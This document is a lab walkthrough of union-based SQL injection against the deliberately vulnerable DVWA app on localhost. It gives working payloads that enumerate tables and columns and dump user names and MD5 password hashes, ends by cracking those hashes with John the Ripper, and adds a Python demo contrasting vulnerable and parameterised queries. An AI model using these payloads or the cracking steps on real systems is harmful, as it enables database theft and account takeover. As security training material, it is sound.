Union Based Injection using John the Ripper

System used :: Kali Linux

Testing on localhost :: (DVWA)

  • Open XAMPP on Linux and start the MySQL and Apache servers

  • Open Iceweasel and browse to 127.0.0.1/login.php

Login to the Application

Username: admin, Password: password

    • Set the security level from 'High' to 'Low' under DVWA Security

    • Set up the database under the Setup tab

    • Click on SQL injection to begin testing

  • Enter 1 in the User ID Field

The form submits with the GET method, so the id and the Submit parameter appear in the URL and can be edited there

  • Check for exception handling by submitting a lone quote:
      '&Submit=Submit#

  • Check using a true condition:
      ' or '1'='1&Submit=Submit#

The above injection reveals every user ID in the userdb database, since the WHERE clause is now always true.

  • Find the number of columns the SQL query returns with ORDER BY probes:
      ' order by 1--+&Submit=Submit#
      ' order by 5--+&Submit=Submit#
      ' order by 3--+&Submit=Submit#
      ' order by 2--+&Submit=Submit#

ORDER BY 1 and ORDER BY 2 succeed while ORDER BY 3 and ORDER BY 5 error out, so the query returns 2 columns

  • Use UNION SELECT to append a second query with the same 2 columns:
      ' union select 1, 2--+&Submit=Submit#

  • To see which columns are displayed, make the original row match nothing with id=-1:
      -1' union select 1, 2--+&Submit=Submit#

  • Check the version:
      ' union select null, version()--+&Submit=Submit#

  • Retrieve database, version and user in one go:
      ' union select concat(database(), ' ', version()), user()--+&Submit=Submit#

  • List the table names:
      ' union select null, table_name from information_schema.tables --+&Submit=Submit#

  • To check for a specific table, for example 'users', in the database (LIKE is needed for the % wildcard; with = the % would be matched literally):
      ' union select null, table_name from information_schema.tables where table_name like "users%"--+&Submit=Submit#

This SQL query will display all the tables consisting of keyword “users”

  • Under the 'users' table, list the column names:
      ' union select null, column_name from information_schema.columns where table_name = "users"--+&Submit=Submit#

  • Retrieve and concatenate the details of all the columns (note the comma before avatar, which the concat needs):
      ' union select concat(user_id,' ',first_name,' ',last_name,' ',avatar),concat(user,' ',password) from users--+&Submit=Submit#
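Added example (not part of the original walkthrough and not DVWA's own code): a minimal Python/sqlite3 model of the vulnerable lookup beside a parameterised version, run against constructed sample rows, showing why the tautology and union payloads above work against string-built SQL and not against bound parameters. Table and column names follow DVWA's users table; the rows and their MD5 hashes are constructed here.

```python
import hashlib
import sqlite3

# Constructed sample data, not DVWA's own dump. DVWA 'low' stores unsalted
# MD5 hashes in users.password, which is why the dumped values can be fed
# straight to a password cracker.
ROWS = [
    (1, "admin", "admin", "admin", hashlib.md5(b"password").hexdigest()),
    (2, "Gordon", "Brown", "gordonb", hashlib.md5(b"abc123").hexdigest()),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                "last_name TEXT, user TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", ROWS)
    return con


def lookup_vulnerable(con, user_id):
    # Same shape as DVWA's 'low' page: the id is spliced into the SQL text,
    # so a quote in the input closes the literal and the rest is parsed as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, user_id):
    # Parameterised query: the value travels separately from the SQL text and
    # is never parsed as SQL, so the same payload is just a non-matching id.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


# The two injections from the walkthrough, without the &Submit=Submit#
# suffix, which belongs to the URL rather than to the SQL.
TAUTOLOGY = "' or '1'='1"
UNION_DUMP = "-1' union select user, password from users--"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, TAUTOLOGY))   # every row: WHERE is always true
    print(lookup_vulnerable(db, UNION_DUMP))  # user/hash pairs in the name columns
    print(lookup_safe(db, UNION_DUMP))        # []: the payload is only a literal id
```

Because the vulnerable query has exactly two result columns, a UNION with any other column count is rejected by the database, which is what the ORDER BY probes above detect.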

    • Copy the users and password hashes and save them in <user>:<password> format in a "password.txt" file under the home directory

    • Use John the Ripper to crack the hashes, with the format set to MD5 (the hashes are unsalted MD5, which John handles as --format=raw-md5)

Hence we have user names & their corresponding passwords.

